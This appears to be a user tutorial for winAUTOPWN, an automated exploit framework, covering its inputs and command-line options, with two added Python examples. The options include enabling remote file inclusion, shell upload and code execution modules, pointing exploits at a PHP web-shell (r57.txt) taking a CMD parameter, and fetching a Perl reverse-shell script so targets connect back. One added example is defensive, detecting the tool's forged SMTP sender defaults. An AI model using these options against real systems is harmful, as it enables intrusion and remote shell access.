winAUTOPWN Tutorial

winAUTOPWN Vulnerability scanner


For the x86 release, run:
    chmod +x bsdAUTOPWN
    ./bsdAUTOPWN
For the x64 release, run:
    chmod +x bsdAUTOPWN.x64
    ./bsdAUTOPWN.x64
For the DFLY SVR4 release, run:
    chmod +x bsdAUTOPWN.dfly.SVR4
    ./bsdAUTOPWN.dfly.SVR4
BSD AUTOPWN won't run on Linux platforms directly. BSD AUTOPWN is the smallest and fastest Systems Exploit Framework available for FreeBSD systems.
How to use winAUTOPWN?

Since winAUTOPWN relies on freely available exploits written in many languages, scripting languages such as Perl, PHP and Python must be present on the system where winAUTOPWN is used. The few exploits written in C, C#, Java or other compiled languages are shipped pre-compiled.
winAUTOPWN has an intuitive console which takes the following inputs:
  1. Target Host IP address – Enter the system on which you want to test exploits
  2. Target Hostname – Enter the Target System’s hostname / DNS Name
  3. Attacker's IP address – Enter your own IP address; it is used for connect-back payloads and by a few exploits.
There are other options too which are required if you intend to test Web Application Vulnerability exploits using winAUTOPWN, these are:
  1. Target CMS Path – Enter the Content Management System path. This is generally the very first folder name seen right after the domain name. Example: if the URL is http://www.somewebsite.com/application1/test.php then the CMS Path is /application1
  2. Actual CMS Path – This is the actual path of the CMS hosted on the Target Server. Example: /opt/share/www or /opt/lampp/htdocs/logicx/tmp/agora
Because of the large number of Remote File Inclusion, Remote Shell Upload and Remote Command Execution vulnerabilities in the winAUTOPWN exploit repository, the modules that test these are set to OFF by default. To enable them, start winAUTOPWN with the arguments:
    winAUTOPWN -doRSH to force the Remote Shell Upload Web-app Vulnerability Module.
    winAUTOPWN -doRFI to force the Remote File Inclusion Web-app Vulnerability Scan Module.
    winAUTOPWN -doRCE to force the Remote Code Execution Web-app Vulnerability Scan Module.
  1. Interactive PHP Shell Path – This is the path of the PHP web-shell to be used along with Remote File Inclusion exploits. There is always a default encoded path. Your path should look something like: http://somewebsite/r57.txt
    This is optional but is essential for RFI Exploits.
  2. CMS Administrator Username – This is the username of the CMS Admin if known to the attacker. This is optional but essential in certain privilege escalation exploits, where the web-app can be used to gain full control over the server.
  3. FTP/CMS Username – This is the username of the FTP / CMS Server if known to the attacker.
  4. FTP/CMS Password – This is the password of the FTP / CMS Server if known to the attacker.
  5. Proxy IP – This is the Proxy IP address which can be used in a few exploits which support this feature.
  6. Proxy Port – This is the Proxy Port which the attacker can use in a few exploits which support this feature.
Note that winAUTOPWN tests these and all other port-80 based exploits after finishing the checks for exploits on all other ports.
winAUTOPWN has a Windows GUI as well, which takes similar inputs and feeds them to the main winAUTOPWN console:
Example of a filled winAUTOPWN GUI which passes the arguments on to the console:
The screenshot above shows a parameter called MAXTHREADS. Every operating system limits the number of connections that can be made to one IP address at a time, and the same limit applies on the side of the IP address being connected to. The portscan module built into winAUTOPWN sets its thread count according to the target IP address: if the address is private, such as 10.x.x.x or 192.168.x.x, it defaults to 100 threads; for a public IP address the default is lower.
This can be overridden with the MAXTHREADS option, for example where public IP addresses are used inside a private LAN, or where you want an extremely slow portscan.
Use the MAXTHREADS parameter on the command line, as in winAUTOPWN.exe MAXTHREADS 20, to set the number of threads, in this case 20.
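The thread-selection policy just described, written out as an added Python example (not winAUTOPWN's own code). It assumes a public-target default of 10, which the tutorial does not state, and it checks all three RFC 1918 ranges rather than only the two the text names:

```python
import ipaddress

# Stated on the page: private targets such as 10.x.x.x or 192.168.x.x get 100 threads.
PRIVATE_DEFAULT_THREADS = 100
# Assumed value: the page only says the public default is "lower" and gives no number.
PUBLIC_DEFAULT_THREADS = 10

# The three RFC 1918 ranges; the tutorial names only the first and the last.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_maxthreads(argv):
    """Return the integer following a MAXTHREADS token (winAUTOPWN.exe MAXTHREADS 20),
    or None when the token is absent. Raises ValueError on a missing or bad value."""
    for i, tok in enumerate(argv):
        if tok.upper() == "MAXTHREADS":
            if i + 1 >= len(argv):
                raise ValueError("MAXTHREADS needs a number after it")
            n = int(argv[i + 1])  # ValueError if the next token is not an integer
            if n < 1:
                raise ValueError("MAXTHREADS must be at least 1")
            return n
    return None


def choose_threads(target_ip, argv=()):
    """Pick the port-scan thread count the way the tutorial describes: an explicit
    MAXTHREADS always wins; otherwise RFC 1918 targets get the private default and
    everything else (including public IPs used inside a LAN) gets the lower one."""
    override = parse_maxthreads(argv)
    if override is not None:
        return override
    addr = ipaddress.ip_address(target_ip)  # ValueError on a malformed address
    if isinstance(addr, ipaddress.IPv4Address) and any(addr in net for net in RFC1918):
        return PRIVATE_DEFAULT_THREADS
    return PUBLIC_DEFAULT_THREADS


if __name__ == "__main__":
    print(choose_threads("192.168.3.3"))                        # 100
    print(choose_threads("203.0.113.7"))                        # 10
    print(choose_threads("203.0.113.7", ["MAXTHREADS", "20"]))  # 20
```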
How to use the command-line in winAUTOPWN?

Command-line usage has always been the mark of a power user in any console-based penetration testing tool. winAUTOPWN's entire interactive interface can be pre-fed with values using the command-line options explained below:
  • -skipscan This option forces winAUTOPWN to skip the port-scan module and instead use the file OpenPorts.TXT in its directory. This is useful when you already know which ports are open on your target system: fill in the port numbers and save the file. It is also helpful when you want winAUTOPWN to check exploits for only one or a few particular ports.
    Example winAUTOPWN.exe -skipscan
  • -onlyscan This option forces winAUTOPWN to skip all of the exploit-testing modules, so it only performs a port scan and exits after printing the list of open ports.
    Example winAUTOPWN.exe -onlyscan
  • -targetIP This option provides the Target IP address of the system being tested. Ensure that you specify the IP address after it.
    Example winAUTOPWN.exe -targetIP 192.168.3.3
  • -targetHOST This option provides the Target Hostname of the system being tested. Specify the complete NetBIOS name for Windows systems on the LAN and the full domain name for target systems on the WAN.
    Example winAUTOPWN.exe -targetHOST SYSTEM-2
    winAUTOPWN.exe -targetHOST www.somewebsite9.com
  • -attackerIP This option provides your own IP, that is, the Attacker's IP address of the system from which winAUTOPWN is being run. Ensure that you specify the IP address after it.
    Example winAUTOPWN.exe -attackerIP 192.168.3.34
  • -cmsPATH This option specifies the Content Management System directory name in the URL. Generally this is the first directory name right after the domain name or the IP address. Ensure that you specify the correct cmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe -cmsPATH /xampp
  • -actcmsPATH This option specifies the actual, internal path of the CMS on the server. Generally this is not visible in the URL, but CMS packages are often installed in a default path, which makes it easy to guess. Ensure that you specify the correct actcmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe -actcmsPATH /Applications/xampp
    winAUTOPWN.exe -actcmsPATH /opt/xampp
  • -phpshellPATH This option specifies the URL of the online PHP web-shell to be used with the Remote File Inclusion exploits. There is a default encoded PHP web-shell path. To change it, specify a phpshellPATH whose shell accepts a variable named CMD for executing system commands, so that the GET request looks like http://shellp.ath/shell.php?CMD=ls
    You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe -phpshellPATH http://website.moc/folder/r57.txt
  • -actphpshellPATH This option specifies the actual internal path of the online PHP web-shell used with the Remote File Inclusion exploits. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe -actphpshellPATH /var/log/tmp
  • -cmsadminUSR This option specifies the administrator/admin username if known. A few web-app exploits need it to work correctly. You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe -cmsadminUSR admin9
  • -ftpUSR This option specifies the FTP username if known. A few FTP exploits need it to work correctly. If you leave this blank, winAUTOPWN uses an internal default FTP username.
    Example winAUTOPWN.exe -ftpUSR user6
  • -ftpPASSWD This option specifies the FTP password if known. A few FTP exploits need it to work correctly. If you leave this blank, winAUTOPWN uses an internal default FTP password.
    Example winAUTOPWN.exe -ftpPASSWD S3cR37P@55W0rD
  • -perlrevshURL This option specifies the URL of a remote Perl script that can send a /bin/sh or an equivalent shell to a remote IP. The script should ideally be invocable as perl <remote_ip> <remote_port>, where remote_ip is your IP, to which the target will connect back, and remote_port is a port opened on your IP. You do not have to supply the script's parameters or open the port locally; winAUTOPWN handles that automatically, which is what WINDOWS AUTOPWN actually means. Any Perl script with these capabilities can be used and can be hosted on any webserver; this option only needs the URL of that Perl file. It is used in the few exploits whose payload is a remote connect-back shell. A default Perl shell path is encoded, so if you have no such script or online resource, leave this option blank and winAUTOPWN will try to handle it on its own.
    Example winAUTOPWN.exe -perlrevshURL http://website.moc/various/reverse-shell.pl
  • -mailFROM This option specifies the sender's email address to be used in a few SMTP exploits. The field has a default sender address crafted by winAUTOPWN, which is always root@<target_hostname>, where target_hostname is the -targetHOST provided earlier. Setting a value here overrides that default.
    Example winAUTOPWN.exe -mailFROM admin@some.web.info
  • -mailTO This option specifies the receiver's email address to be used in a few SMTP exploits. The field has a default receiver address crafted by winAUTOPWN, which is always postmaster@<target_hostname>, where target_hostname is the -targetHOST provided earlier. Setting a value here overrides that default.
    Example winAUTOPWN.exe -mailTO postmaster@some.web.info
  • -proxyIP This option provides the Proxy Server IP address. Note that only a few exploits support proxies, and only when both a Proxy IP and a Proxy Port have been supplied. Ensure that you specify the correct Proxy IP address after it.
    Example winAUTOPWN.exe -proxyIP 192.168.3.80
  • -proxyPORT This option provides the Proxy Server port number. Note that only a few exploits support proxies, and only when both a Proxy IP and a Proxy Port have been supplied. Ensure that you specify the correct Proxy Port number after it.
    Example winAUTOPWN.exe -proxyPORT 8080
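The -mailFROM and -mailTO defaults above give a mail administrator something concrete to look for: an SMTP transaction arriving from a remote peer whose envelope sender is root@<own hostname> and whose recipient is postmaster@<own hostname>, i.e. the server's own name forged as sender. The following is an added Python example (not part of the tutorial or of the tool) that runs that check over constructed log lines in a made-up one-transaction-per-line format; the hostname, timestamps and peer addresses are all constructed:

```python
import re

# Constructed log format (not from any real MTA): one SMTP transaction per line,
# envelope addresses optionally wrapped in angle brackets.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) peer=(?P<peer>\S+) "
    r"mail_from=<?(?P<sender>[^>\s]+)>? rcpt_to=<?(?P<rcpt>[^>\s]+)>?$"
)

# Constructed sample: two forged-self transactions from one remote peer, one local
# cron-style delivery from loopback, and two unrelated messages.
SAMPLE_LOG = """\
2024-01-01T10:00:01 peer=198.51.100.20 mail_from=alice@partner.test rcpt_to=bob@mail.example.test
2024-01-01T10:00:05 peer=192.168.3.34 mail_from=root@mail.example.test rcpt_to=postmaster@mail.example.test
2024-01-01T10:00:06 peer=192.168.3.34 mail_from=<root@MAIL.EXAMPLE.TEST> rcpt_to=<Postmaster@mail.example.test>
2024-01-01T10:00:09 peer=127.0.0.1 mail_from=root@mail.example.test rcpt_to=root@mail.example.test
2024-01-01T10:00:12 peer=192.168.3.34 mail_from=admin@some.web.info rcpt_to=postmaster@some.web.info
"""


def parse_line(line):
    """Parse one log line into a dict, lower-casing the envelope addresses so that
    case tricks in the sender or recipient do not slip past the comparison."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sender"] = rec["sender"].lower()
    rec["rcpt"] = rec["rcpt"].lower()
    return rec


def flag_forged_self_mail(log_text, own_hostname, trusted_peers=("127.0.0.1",)):
    """Return (timestamp, peer) for every transaction from a non-trusted peer whose
    envelope matches the tutorial's defaults: root@<own host> -> postmaster@<own host>.
    Loopback is skipped because local root mail (cron, daemons) is normal there."""
    host = own_hostname.lower()
    wanted_sender = f"root@{host}"
    wanted_rcpt = f"postmaster@{host}"
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["peer"] in trusted_peers:
            continue
        if rec["sender"] == wanted_sender and rec["rcpt"] == wanted_rcpt:
            hits.append((rec["ts"], rec["peer"]))
    return hits


if __name__ == "__main__":
    for ts, peer in flag_forged_self_mail(SAMPLE_LOG, "mail.example.test"):
        print(f"{ts} forged root->postmaster envelope from {peer}")
```

A hit is an indicator to correlate with port-scan activity from the same peer, since a user of the tool can override both defaults with -mailFROM and -mailTO.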

